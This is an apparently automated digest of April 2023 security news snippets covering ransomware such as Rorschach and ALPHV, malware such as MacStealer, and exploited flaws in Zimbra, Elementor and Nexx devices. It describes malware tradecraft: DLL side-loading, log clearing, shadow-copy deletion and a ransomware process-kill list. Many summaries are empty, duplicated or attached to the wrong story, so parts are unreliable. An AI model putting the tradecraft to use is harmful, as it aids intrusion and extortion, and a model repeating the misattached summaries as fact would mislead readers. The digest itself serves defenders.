User data offered for sale (Kaspersky) Phishing-as-a-service (PhaaS) subscriptions that provide access to tools, beginner guides, technical support, and regular updates for the provided anti-detection systems. "A digital identification tool provided by OCR Labs to major banks and government agencies leaked sensitive credentials, putting clients at severe risk. The Cybernews research team discovered a misconfiguration in the OCR Labs system that exposed sensitive data. The company is a leading provider of digital ID verification tools, with its IDkit tool being used […]
The post OCR Labs exposes its systems, jeopardizing major banking clients appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, North Korea) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The file contained database credentials, including host, port, and username, Amazon Web Services (AWS) with Simple Queue Service (SQS) access credentials, application tokens, and various application programming interface (API) keys. The discovered data leak impacted financial institutions in Australia – QBANK, mainly used by government agency workers, Defence Bank, catering to the Australian armed forces, and MA Money, a company that focuses on residential mortgages. "Autosummary:
"Autosummary:
“As a precaution, access is not provided to the University’s eLearning Platform, Employment Portal, the Portal for applications of prospective students, and other critical systems that mainly concern the University community,” reads the OUC announcement. "An unbranded ransomware strain that recently hit a US-based company is being deployed by attackers who are misusing a tool included in a commercial security product, Check Point researchers have found. The solution in question is Palo Alto Networks’ Cortex XDR, whose Dump Service Tool the attackers appropriated and are now misusing to side-load the DLL that decrypts and injects the (newly labeled) Rorschach ransomware. Rorschach’s execution flow (Source: Check Point) The peculiarities of Rorschach … More
The post Rorschach ransomware deployed by misusing a security tool appeared first on Help Net Security.
"Autosummary:
It can spread itself automatically when executed on a Domain Controller (DC), where it creates a group policy that puts copies of itself on all workstations, then one that kills specific processes, and finally one that registers a scheduled task that will run the main executable It clears Windows event logs on affected machines, disables the Windows firewall, and deletes shadow volumes and backups (to make data recovery more difficult) It has a hard-coded configuration but has additional capabilities that can be deployed via different command line arguments (e.g., the operator can choose not to change the wallpaper of the infected machine or deliver a ransom note, or make it so that a password is needed to run the sample) "Ransomware gang Money Message claims to have hacked the Taiwanese multinational IT corporation MSI (Micro-Star International). Ransomware gang Money Message announced to have hacked the Taiwanese multinational IT corporation MSI (Micro-Star International). Micro-Star International AKA MSI designs, manufactures, and sells motherboards and graphics cards for customers in the United States, Canada, and internationally. MSI is headquartered in Taipei, […]
The post Money Message ransomware group claims to have hacked IT giant MSI appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"In a rush to file your taxes? Watch out for cybercriminals preying on stressed taxpayers as Tax Day looms large on the horizon.
The post Steer clear of tax scams – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"Categories: News Categories: Scams Tags: tax scams Tags: efile.com Tags: US tax 2023 Tags: backdoor Tags: Trojan Tags: Johannes Ullrich Tags: MalwareHunterTeam Tags: /u/SaltyPotter Tags: fake network error notification Cybercriminals have compromised eFile.com to host malicious code that allows for the download of Trojans. |
The post Visitors of tax return e-file service may have downloaded malware appeared first on Malwarebytes Labs.
"Autosummary:
Known figures in cybersecurity, such as MalwareHunterTeam (@malwarehunterteam) and Johannes Ullrich (@johullrich) of SANS, caught wind of the potential site compromise and dug in, with each writing their analysis. The IRS-authorized electronic filing service for tax returns, eFile.com, has been caught serving a couple of malicious JavaScript (JS) files these past few weeks, according to several security researchers and corroborated by BleepingComputer. "Categories: News Tags: IoT Tags: garage Tags: door Tags: remote Tags: open Tags: app Tags: switch Tags: alarm Tags: Nexx Multiple exploits are impacting a line of smart products for the home. |
The post IoT garage door exploit allows for remote opening attack appeared first on Malwarebytes Labs.
"Autosummary:
If you have devices and apps being used to power your home, alarms, doors, windows, or anything else, now is the time to check if those passwords are hard coded. From the CISA mitigations page, which doesn’t go quite as far as Sabetan’s advice to remove all of the Nexx products from your home or place of business: Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the Internet. "Categories: Business It"s time to buckle up and embark on a whimsical journey through the twists and turns of Malwarebytes" evolution. |
The post A whirlwind adventure: Malwarebytes" 15-year journey in business cybersecurity appeared first on Malwarebytes Labs.
"Autosummary:
Act III: The Plot Thickens (June 2014 - 2016) In 2014, Malwarebytes launched the Anti-Malware Remediation Tool, a sleek, portable solution for businesses to eliminate malware with minimal fuss. In 2018, we expanded our portfolio with Endpoint Protection for Mac, Endpoint Detection and Response (EDR) for Windows endpoints, EDR Ransomware Rollback, and EDR Endpoint Isolation. Act VIII: The Mobile Frontier (2023 and beyond) As we set our sights on the future, 2023 marked our foray into Mobile Protection for iOS, Android, and Chromebook platforms. "Many sectors view AI and machine learning with mixed emotions, but for the cybersecurity industry, they present a double-edged sword. On the one hand, AI provides powerful tools for cybersecurity professionals, such as automated security processing and threat detection. On the other hand, cybercriminals have access to the same technology, making it a constant cat-and-mouse game between attackers and defenders. In this Help Net Security video, Matt Aldridge, Principal Solutions Consultant at OpenText Cyber Security, … More
The post How AI is transforming cybersecurity for better and worse appeared first on Help Net Security.
"Autosummary:
"Autosummary:
It"s important to look for malware solutions that can confront today"s key threats, such as known malware, polymorphic variants, ransomware, zero-day exploits, and Advanced Persistent Threats (APTs). This approach will not only help stop and mitigate the damage from malware, but defend against other types of threats too, such as credential theft as a result of phishing, insider threats, and supply-chain attacks. "Autosummary:
Typhon was first documented by Cyble in August 2022, detailing its myriad features, including hijacking clipboard content, capturing screenshots, logging keystrokes, and stealing data from crypto wallet, messaging, FTP, VPN, browser, and gaming apps. "Resecurity has recently identified the STYX Marketplace, a new cybercriminal e-commerce platform with a specialized focus on financial fraud and money laundering. The STYX marketplace was launched at the beginning of 2023. This platform is specifically designed to facilitate financial crime, providing cybercriminals with a range of services, including stolen financial data, credit card information, […]
The post STYX Marketplace emerged in Dark Web focused on Financial Fraud appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, STYX Marketplace) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnThis platform is specifically designed to facilitate financial crime, providing cybercriminals with a range of services, including stolen financial data, credit card information, forged documents, money laundering services, victim reconnaissance ‘lookups’, and more. "Autosummary:
"Autosummary:
A month later, the infamous Emotet botnet was observed sending out an SFX archive that, once opened by a user, would automatically extract a second password-protected SFX archive, enter the password, and execute its content without further user interaction using a batch script. "Autosummary:
"HP would take up to 90 days to address a critical flaw, tracked as CVE-2023-1707, that resides in the firmware of some business-grade printers. HP is aware of a critical vulnerability, tracked as CVE-2023-1707 (CVSS v3.1 score 9.1), that affects tens of HP Enterprise LaserJet and HP LaserJet Managed Printers models. The exploitation of the […]
The post HP would take up to 90 days to fix a critical bug in some business-grade printers appeared first on Security Affairs.
"Autosummary:
"The CISA ‘s Joint Cyber Defense Collective (JCDC) initiative is going to build operation plans for protecting and responding to cyber threats. What comes to mind when you think of cyber criminals? Depending on who you ask, you’ll get a variety of answers. For some, a cyber criminal matches some of the Hollywood tropes: a […]
The post CISA JCDC Will Focus on Energy Sector appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On About the Author: Michael Sanchez, CEO (CISA), has over 35 years of experience in information technology, cybersecurity, physical security, risk, compliance, and audit. "Autosummary:
"The eFile.com online service, which is authorized by the US Internal Revenue Service (IRS), was spotted serving malicious malware to visitors. eFile.com, the personal online tax preparation and e-file service authorized by the US Internal Revenue Service (IRS), was spotted serving malware to visitors. The service helps taxpayers to file tax returns, experts reported that […]
The post Tax preparation and e-file service eFile.com compromised to serve malware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, eFile.com) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Among the services provided are money laundering, identity theft, distributed denial-of-service (DDoS), bypassing two-factor authentication (2FA), fake or stolen IDs and other personal data, renting malware, using cash-out services, email and telephone flooding, identity lookup, and much more. "Autosummary:
String deobfuscation (Cisco) The researchers noticed a more more comprehensive mechanism for avoiding the infection of analysis machines, with the malware now looking at a wider range of criteria, including usernames, CPUIDs, applications, processes, debugger/emulation checks, and geolocation data before running the malicious routines. "Categories: News Tags: ransomware Tags: fake Tags: faker Tags: fraud Tags: scam Tags: bogus Tags: midnight We take a look at a ransomware group that doesn"t produce any ransomware, only threats. |
The post Fake ransomware demands payment without actually encrypting files appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.Posted: April 5, 2023 by We take a look at a ransomware group that doesn"t produce any ransomware, only threats.If your incident response consists of opening up one of these missives, panicking, and racing to pay fraudsters, it could end up being a very costly and needless mistake.Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files. "A series of vulnerabilities in multiple smart devices manufactured by Nexx can be exploited to remotely open garage doors, and take control of alarms and plugs. In late 2022, the researcher Sam Sabetan discovered a series of critical vulnerabilities in several smart devices manufactured by Nexx, including Smart Garage Door Openers, Alarms, and Plugs. A […]
The post Nexx bugs allow to open garage doors, and take control of alarms and plugs appeared first on Security Affairs.
"Autosummary:
The researchers reported the issues to the United States Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA), which assigned the following five CVEs: Use of Hard-coded Credentials CWE-798 (CVE-2023–1748, CVSS3.0: 8.6) Authorization Bypass Through User-Controlled Key CWE-639 (CVE-2023–1749, CVSS3.0: 6.5) Authorization Bypass Through User-Controlled Key CWE-639 (CVE-2023–1750, CVSS3.0: 7.1) Improper Input Validation CWE-20 (CVE-2023–1751, CVSS3.0: 7.5) Improper Authentication Validation CWE-287 (CVE-2023–1752, CVSS3.0: 8.1) "Using structured, machine-readable data in defensive systems can present a significant challenge. In this Help Net Security interview, Giorgos Georgopoulos, CEO at Elemendar, discusses these challenges and how Elemendar’s application can help cyber analysts and CISOs. Giorgos highlights the company’s customizable technology, which can be tailored to meet the unique needs of different organizations, as well as the security measures that Elemendar takes to protect the data processed by their AI technology. What are some … More
The post Streamlining cybersecurity decision-making for analysts and CISOs appeared first on Help Net Security.
"Autosummary:
That’s because, to use CTI as structured, machine-readable data in a defensive system, you need to translate it from a human-readable form into a machine-readable one: the greatest benefit from cyber threat intelligence comes with higher-level information that is expressed in human-readable forms, because a human wrote it in the first place. Yes, Elemendar’s technology can be customized to meet the specific needs of different organizations at three stages: when integrating the data sources for the application to process, when processing the data inside the application, and when integrating the outputs into an organization’s cyber defense workflows. "Guardz has launched its dedicated cybersecurity platform for MSPs and IT professionals that empowers MSPs to protect their clients with automated remediation plans, to improve their reporting for existing clients and better obtain new ones, and to cut operational and licensing costs up to 75%, ultimately boosting revenue. Cybersecurity attacks aimed at small and mid-size businesses are on the rise, yet only 14% of these companies are prepared to defend themselves. Many either cannot afford … More
The post Guardz launches dedicated cybersecurity platform for MSPs and IT professionals appeared first on Help Net Security.
"Autosummary:
These include contracting with multiple vendors, creating an affordable bundled cyber solution for their customers, mastering and deploying a variety of technologies for each client, and demonstrating the risk, exposure, and financial impact to new clients, all while delivering ongoing threat detection and remediation across multiple attack vectors. "Breaking down the silos between disaster recovery (DR) and cybersecurity has become increasingly important to ensure maximum business resiliency against outages, data breaches, and ransomware attacks. Yet, many organizations still operate these functions separately, leading to slower response times, budgeting challenges, duplicated resource allocations, and an overall weaker security and business continuity posture. Why must DR and cybersecurity teams collaborate? Encouraging collaboration between your disaster recovery and cybersecurity teams can offer several benefits for your … More
The post How can organizations bridge the gap between DR and cybersecurity? appeared first on Help Net Security.
"Autosummary:
By having integrated tools such as security automation platforms, security incident & event management (SIEM), endpoint detection & response (EDR), data loss prevention (DLP), organizations can dramatically reduce the time it takes for them to detect anomalies or malicious activity on their network as well as speed up incident response times when needed.Yet, many organizations still operate these functions separately, leading to slower response times, budgeting challenges, duplicated resource allocations, and an overall weaker security and business continuity posture. "Autosummary:
"Autosummary:
BleepingComputer has obtained the so-called "update.js" and we noticed the fake SSL error message present as base64-encoded HTML code (highlighted below) inside of it: Fake SSL error message which is just base64-encoded HTML (BleepingComputer) An HTML excerpt from the decoded string generating the fake SSL error is shown below: Decoded base64 HTML code generating the fake SSL error message (BleepingComputer) The malicious JavaScript file "update.js", further attempts to prompt users to download next stage payload, depending on whether they are using Chrome "Autosummary:
"Arid Gopher, like its predecessor Micropsia, is an info-stealer malware, whose intent is to establish a foothold, collect sensitive system information, and send it back to a C2 (command-and-control) network," Deep Instinct said at the time. "Autosummary:
Next, they downloaded additional tools on the host like LAZAGNE, LIGOLO, WINSW, RCLONE, and ultimately the ALPHV ransomware encryptor through the Background Intelligent Transfer Service (BITS). "Autosummary:
Rorschach details Researchers at cybersecurity company Check Point, responding to an incident at a company in the U.S., found that Rorschach was deployed using the DLL side-loading technique via a signed component in Cortex XDR, the extended detection and response product from Palo Alto Networks. "When Adobe released security updates for its ColdFusion application development platform last month, it noted that one of the vulnerabilities (CVE-2023-26360) had been exploited in the wild “in very limited attacks.” Were your servers among those hit? And what should you do if they were? About CVE-2023-26360 (and CVE-2023-26359) CVE-2023-26360 is an improper access control vulnerability that could result in arbitrary code execution in the context of the current user, and was reported to Adobe … More
The post Prevent and detect Adobe ColdFusion exploitation (CVE-2023-26360, CVE-2023-26359) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The Rorschach ransomware employs a highly effective and fast hybrid-cryptography scheme, which blends the curve25519 and eSTREAM cipher hc-128 algorithms for encryption purposes," researchers Jiri Vinopal, Dennis Yarizadeh, and Gil Gekker explained. "Autosummary:
"Rilide malware is disguised as a legitimate Google Drive extension and enables threat actors to carry out a broad spectrum of malicious activities, including monitoring browsing history, taking screenshots, and injecting malicious scripts to withdraw funds from various cryptocurrency exchanges," Trustwave SpiderLabs Research said in a report shared with The Hacker News. "A new ransomware strain named Rorschach ransomware supports the fastest file-encrypting routine observed to date. Check Point Research (CPR) and Check Point Incident Response Team (CPIRT) researchers detected a previously unknown ransomware strain, dubbed Rorschach ransomware, that was employed in attack against a US-based company. The experts pointed out that the Rorschach ransomware appears to be unique. […]
The post Rorschach ransomware has the fastest file-encrypting routine to date appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Rorschach ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The Rorschach ransomware uses the following files: cy.exe – Cortex XDR Dump Service Tool version 7.3.0.16740, abused to side-load winutils.dll – Cortex XDR Dump Service Tool version 7.3.0.16740, abused to side-load winutils.dll winutils.dll – Packed Rorschach loader and injector, used to decrypt and inject the ransomware. "US CISA has added a Zimbra flaw, which was exploited in attacks targeting NATO countries, to its Known Exploited Vulnerabilities catalog U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a Zimbra flaw, tracked as CVE-2022-27926, to its Known Exploited Vulnerabilities Catalog. The CVE-2022-27926 flaw affects Zimbra Collaboration version 9.0.0, which is used to host publicly-facing […]
The post CISA adds Zimbra bug exploited in attacks against NATO countries to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, 3CX Supply chain) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Categories: Business There are 5 cyberthreats for channel partners to focus on in 2023. |
The post 2023 State of Malware Report: What the channel needs to know to stay ahead of threats appeared first on Malwarebytes Labs.
"Autosummary:
The channel, comprising managed service providers (MSPs), Systems Integrators (SIs), value-added resellers (VARs), and more, plays a vital role in providing cybersecurity for companies around the globe today. "Categories: News Categories: Ransomware Tags: pre-ransomware notifications Tags: JCDC Tags: CISA Tags: ransomware Tags: IRS Tags: Emotet Tags: MDR CISA has published the first results of its pre-ransomware notifications that were introduced at the start of 2023. And they appear to be working. |
The post Pre-ransomware notifications are paying off right from the bat appeared first on Malwarebytes Labs.
"Autosummary:
Even though this initiative is relatively young, CISA says it has notified over 60 entities across the energy, healthcare, water/wastewater, education, and other sectors about potential pre-ransomware intrusions, and we’ve confirmed that many of them identified and remediated the intrusion before encryption or data loss occurred.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. The success of the operation relies on a few key factors: Sharing intelligence by the cybersecurity research community, infrastructure providers, and cyber threat intelligence companies about potential early-stage ransomware activity. "Trace3’s acquisition of Set Solutions is a continuation of the company’s strategic expansion plan. The investment allows the combined companies to deepen cybersecurity capabilities to drive success for commercial and enterprise clients. Set Solutions has a longstanding history of alleviating challenges that technology leaders encounter in the ongoing evolution of the cyber threat landscape. Trace3’s security portfolio is strengthened by Set Solutions’ specialized expertise in cybersecurity and focus on mature and emerging technology-based solutions. This … More
The post Trace3 acquires Set Solutions to boost cybersecurity capabilities appeared first on Help Net Security.
"Autosummary:
"An ALPHV/BlackCat ransomware affiliate was spotted exploiting vulnerabilities in the Veritas Backup solution. An affiliate of the ALPHV/BlackCat ransomware gang, tracked as UNC4466, was observed exploiting three vulnerabilities in the Veritas Backup solution to gain initial access to the target network. Unlike other ALPHV affiliates, UNC4466 doesn’t rely on stolen credentials for initial access to victim environments. Mandiant […]
The post ALPHV/BlackCat ransomware affiliate targets Veritas Backup solution bugs appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ALPHV/BlackCat ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Then the threat actor used the Background Intelligent Transfer Service (BITS) to download additional tools such as LAZAGNE, LIGOLO, WINSW, RCLONE, and finally the ALPHV ransomware encryptor. The Teacher – Most Educational Blog The Entertainer – Most Entertaining Blog The Tech Whizz – Best Technical Blog Best Social Media Account to Follow (@securityaffairs) Please nominate Security Affairs as your favorite blog. "Autosummary:
"We’ve been developing machine learning-based cybersecurity systems for many years and began developing automation for analysis in our labs in 2005. These early automation projects have since evolved into full-blown machine-learning frameworks. Since then, we’ve been waiting for our enemies to make the same move, and after 18 years, the wait is over – malware with artificial intelligence has arrived. Defenders have been able to automate their work for some time, enabling excellent detection, analysis … More
The post Malware and machine learning: A match made in hell appeared first on Help Net Security.
"Autosummary:
However, deep fakes of real people are something different altogether, and while abuse of deep fake images, voices and videos is, thus far, relatively small in scale, there is no doubt that this will get worse. Automated malware campaigns will drastically change the reaction speed of malware gangs The technology to run malware campaigns and automatically bypass new defenses is most definitely doable nowadays, but thus far, we haven’t seen anything of the kind. "Malwarebytes launched WorldBytes, a next-generation mobile security application that takes the malware scanning technologies that customers know and love and applies them to the first frontier of human evolution: real life interactions. Powered by Malwarebytes and AI technology, WorldBytes empowers users to use their mobile devices to scan the world around them and get real-time threat assessments of anything and everything – including questionable Tinder dates, the unlabeled sauce at the back of their fridge … More
The post Malwarebytes unveils WorldBytes to help users reveal the hidden cyber threats around them appeared first on Help Net Security.
"Autosummary:
"Autosummary:
NullMixer also stands out for simultaneously dropping a wide variety of off-the-shelf malware, including PseudoManuscrypt, Raccoon Stealer, GCleaner, Fabookie, and a new malware loader referred to as Crashtech Loader, leading to large-scale infections. "Autosummary:
The issue was limited to parts of the Capita network, and there is no evidence of customer, supplier, or colleague data having been compromised” - Capita Capita says that the disruption only affected some services provided to individual clients, while most of its customer base didn’t experience any adverse impacts. "For a fourth consecutive quarter, LogRhythm releases new cybersecurity capabilities that makes it easier for security teams to reduce noise, prioritize work and quickly secure their environments. Analysts gain a simplified experience to focus on detecting, investigating, and responding to threats. In its continued commitment to customer satisfaction, LogRhythm also announces the Unlimited Upgrades Service by the Professional Services team which assists customers in upgrading to every quarterly SIEM release with ease. “LogRhythm is proud … More
The post LogRhythm releases new cybersecurity capabilities to improve operational efficiency appeared first on Help Net Security.
"Autosummary:
"Microsoft addressed a misconfiguration flaw in the Azure Active Directory (AAD) identity and access management service. Microsoft has addressed a misconfiguration issue impacting the Azure Active Directory (AAD) identity and access management service that exposed multiple Microsoft applications, including the Bing management portal, to unauthorized access. The vulnerability was discovered by Wiz Research which determined […]
The post Microsoft fixed Azure AD bug that led to Bing.com results manipulation and account takeover appeared first on Security Affairs.
"Autosummary:
Below is the disclosure timeline: Jan. 31, 2023 – Wiz Research reported the Bing issue to MSRC – Wiz Research reported the Bing issue to MSRC Jan. 31, 2023 – MSRC issues initial fix to Bing app – MSRC issues initial fix to Bing app Feb. 25, 2023 – Wiz Research reported the other vulnerable applications to MSRC – Wiz Research reported the other vulnerable applications to MSRC Feb. 27, 2023 – MSRC starts issuing fixes for said applications – MSRC starts issuing fixes for said applications Mar. 20, 2023 – "Autosummary:
The criminals behind these cryptocurrency fraud scams (also known as pig butchering or cryptocurrency confidence scams) approach their victims via various dating platforms, messaging apps, or social media platforms, build trust, and introduce them to investment schemes which eventually allow them to empty the targets" crypto wallets. "Ransomware.
It’s one word that can strike a chill in anyone from a corporate C-suite to a home user. It’s sometimes hard to get a feel for the overall ransomware industry (and yes, it’s now an industry). But based on anecdotal reviews of forums and social media, it appears as though attacks against individuals are slowing. I no longer see people report they’ve been hit by ransomware on their PCs.
But it may be that attackers have realized that going after “one-off” targets isn’t the best business plan. In fact, in a recent Microsoft Secure online seminar (registration required), Jessica Payne and Geoff McDonald discuss how ransomware is now a big business, offered as a service by those who sell access to compromised networks to others.
Autosummary:
With this change, when users open a file that came from the internet, such as an email attachment, and that file contains macros, there will be a red notice shown at the top of the opened file.” Even if you’re not a Microsoft 365 Defender customer, you can deploy ASR rules; the specific rules that target ransomware processes: Block executable files from running unless they meet a prevalence, age, or trusted list criterion.In fact, in a recent Microsoft Secure online seminar (registration required), Jessica Payne and Geoff McDonald discuss how ransomware is now a big business, offered as a service by those who sell access to compromised networks to others. "Autosummary:
"The Chinese government is instituting a cybersecurity review of US-based memory chip maker Micron’s products being sold in the country, in the latest move in the ongoing semiconductor trade dispute that pits China against the US and its allies.
The rupture between China and the West over semiconductors is causing chip supply chain disruptions that threaten many of the fastest-growing parts of the technology sector – mainly AI and cloud technology. The chip war is also putting global enterprises in the crosshairs, as auto manufacturing and a host of other sectors are increasingly dependent on the availability of advanced silicon for growth.
Autosummary:
China states concern over national security A brief Chinese government statement issued on March 31 said that the review of Micron is being undertaken “in order to ensure the security of the key information infrastructure supply chain, prevent network security risks caused by hidden product problems, and maintain national security,” according to a machine translation of the announcement. "Categories: Apple Categories: News Tags: MacStealer Tags: mac infostealer Tags: information stealer Tags: Apple Tags: Thomas Reed Tags: iCloud Keychain MacStealer could be an infamous stealer in the making, but right now, it needs improvement, according to Malwarebytes expert. |
The post New macOS malware steals sensitive info, including a user"s entire Keychain database appeared first on Malwarebytes Labs.
"Autosummary:
The malware then proceeds to collect and save the following also within the TMP folder: Account passwords, browser cookies, and stored credit card details in Firefox, Chrome, and Brave Cryptocurrency wallets (Binance, Coinomi, Exodus, Keplr Wallet, Martian Wallet, MetaMask, Phantom, Tron, Trust Wallet) Keychain database in its encoded (base64)form Keychain password in text format Various files (.TXT, .DOC, .DOCX, .PDF, .XLS, .XLSX, .PPT, .PPTX, .JPG, .PNG, .CVS, .BMP, .MP3, .ZIP, .RAR, .PY, .DB) System information in text form MacStealer also compresses everything it stole in a ZIP file and sends it to remote C&C servers for the threat actor to collect later. "Categories: Exploits and vulnerabilities Categories: News Tags: Azure Tags: Microsoft Tags: Super FabriXss Tags: RCE Tags: vulnerability Tags: CVE-2023-23383 Researchers disclosed how they found a remote code execution vulnerability in Azure Service Fabric Explorer. |
The post Super FabriXss: an RCE vulnerability in Azure Service Fabric Explorer appeared first on Malwarebytes Labs.
"Autosummary:
By trying some simple HTML code like a H1 tag that is often used to display the main topic on a web page in a larger font size, they found that clicking on Cluster in the options on the Events tab resulted in a new title being displayed as a large title, due to the effect of the <h1> tag. Image courtesy of Orca Security While this is no serious attack, it shows that there are ways to circumvent the input sanitation that takes place, or should take place and it might be possible to inject more complex HTML code. "Files leaked by Russian IT contractor NTC Vulkan show that Russia-linked Sandworm APT requested it to develop offensive tools. Documents leaked from Russian IT contractor NTC Vulkan show it was likely involved in the development of offensive tools. The documents demonstrate that it also developed hacking tools for the Russia-linked APT group Sandworm. The Sandworm group […]
The post Leaked documents from Russian firm NTC Vulkan show Sandworm cyberwarfare arsenal appeared first on Security Affairs.
"Autosummary:
In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine, including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe. "Autosummary:
to clear shadow volume copies The ransomware will then terminate the following process: sql.exe,oracle.exe,ocssd.exe,dbsnmp.exe,synctime.exe,agntsvc.exe,isqlplussvc.exe,xfssvccon.exe,mydesktopservice.exe,ocautoupds.exe,encsvc.exe,firefox.exe,tbirdconfig.exe,mdesktopqos.exe,ocomm.exe,dbeng50.exe,sqbcoreservice.exe,excel.exe,infopath.exe,msaccess.exe,mspub.exe,onenote.exe,outlook.exe,powerpnt.exe,steam.exe,thebat.exe,thunderbird.exe,visio.exe,winword.exe,wordpad.exe,vmms.exe,vmwp.exe Next, the ransomware shuts down the following Windows services: vss, sql, svc$, memtas, mepocs, sophos, veeam, backup, vmms When encrypting files, it will not append any extension, but this can change depending on the victim. "Autosummary:
The bug, patched in December 2022 (version 4.4.2 Patch Level 2), has been co-opted by cybercriminals in ransomware campaigns associated with Buhti and IceFire since February, shortly after the release of the proof-of-concept (PoC) exploit. "Autosummary:
"This makes it possible for a malicious user to turn on the registration page (if disabled) and set the default user role to administrator so they can create an account that instantly has the administrator privileges," Patchstack said in an alert of March 30, 2023. "Autosummary:
In days following the disclosure, DISH continued to struggle bringing its IT systems and the website, Dish.com back up: DISH Network websites faced a multi-week network outage (BleepingComputer) Following the news of Dish ransomware attack, the Network"s stock price fell $0.79 per share, "or 6.48%, to close at $11.41 per share on February 28, 2023," states the complaint. "Autosummary:
To make matters worse, the exploit could be weaponized to trigger a cross-site scripting (XSS) attack on Bing.com and extract a victim"s Outlook emails, calendars, Teams messages, SharePoint documents, and OneDrive files. "Autosummary:
It is unclear how victims are selected but one possibility is from publicly available sources, such as the initial attacker’s data leak site, social media, news reports, or company disclosures. Such incidents echo the activity of an extortion group that in 2017 sent DDoS threats to thousands of companies under the names of infamous hacker groups at the time (e.g. New World Hackers, Lizard Squad, LulzSec, Fancy Bear, and Anonymous). "CISA has added nine flaws to its Known Exploited Vulnerabilities catalog, including bugs exploited by commercial spyware on mobile devices. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added nine new vulnerabilities to its Known Exploited Vulnerabilities Catalog. Five of the issues added by CISA to its catalog are part of the exploits used by surveillance […]
The post CISA adds bugs exploited by commercial surveillance spyware to Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
CVE-2022-38181 – Arm Mali GPU Kernel Driver Use-After-Free Vulnerability CVE-2023-0266 – Linux Kernel Use-After-Free Vulnerability CVE-2022-3038 – Google Chrome Use-After-Free Vulnerability CVE-2022-22706 – Arm Mali GPU Kernel Driver Unspecified Vulnerability "The LockBit ransomware gang announced the publishing of data stolen from the South Korean National Tax Service. On March 29, 2023, The Lock Bit ransomware gang announced the hack of the South Korean National Tax Service. The group added the South Korean agency to its Tor leak site and announced the release of stolen data […]
The post LockBit leaks data stolen from the South Korean National Tax Service appeared first on Security Affairs.
"Autosummary:
"Russian hacking group Winter Vivern has been actively exploiting Zimbra flaws to steal the emails of NATO and diplomats. A Russian hacking group, tracked Winter Vivern (aka TA473), has been actively exploiting vulnerabilities (CVE-2022-27926) in unpatched Zimbra instances to gain access to the emails of NATO officials, governments, military personnel, and diplomats. The CVE-2022-27926 flaw […]
The post Russian APT group Winter Vivern targets email portals of NATO and diplomats appeared first on Security Affairs.
"Autosummary:
A Russian hacking group, tracked Winter Vivern (aka TA473), has been actively exploiting vulnerabilities (CVE-2022-27926) in unpatched Zimbra instances to gain access to the emails of NATO officials, governments, military personnel, and diplomats. "Autosummary:
To enable the fix, Windows users on 64-bit systems can make the following Registry changes: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config] "EnableCertPaddingCheck"="1" [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Cryptography\Wintrust\Config] "EnableCertPaddingCheck"="1" Once these Registry keys are enabled, you can see how differently Microsoft validates the signature in the malicious d3dcompiler_47.dll DLL used in the 3CX supply chain attack. "Autosummary:
"Autosummary:
"Autosummary:
" The findings come amid revelations that at least three Russian intelligence agencies, including FSB, GRU (linked to Sandworm), and SVR (linked to APT29), likely use software and hacking tools developed by a Moscow-based IT contractor named NTC Vulkan. "Autosummary:
"Autosummary:
"Threat actors are actively exploiting a high-severity flaw in the Elementor Pro WordPress plugin used by more than eleven million websites WordPress security firm PatchStack warns of a high-severity vulnerability in the Elementor Pro WordPress plugin that is currently being exploited by threat actors in the wild. Elementor Pro is a paid plugin that is currently installed on […]
The post Hackers are actively exploiting a flaw in the Elementor Pro WordPress plugin appeared first on Security Affairs.
"Autosummary:
Nominate here: https://docs.google.com/forms/d/e/1FAIpQLSfaFMkrMlrLhOBsRPKdv56Y4HgC88Bcji4V7OCxCm_OmyPoLw/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, WordPress plugin) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: News Categories: Ransomware Tags: World Backup Day Backups are your last line of defense against ransomware, if they work. |
The post 3 tips for creating backups your organization can rely on when ransomware strikes appeared first on Malwarebytes Labs.
"Autosummary:
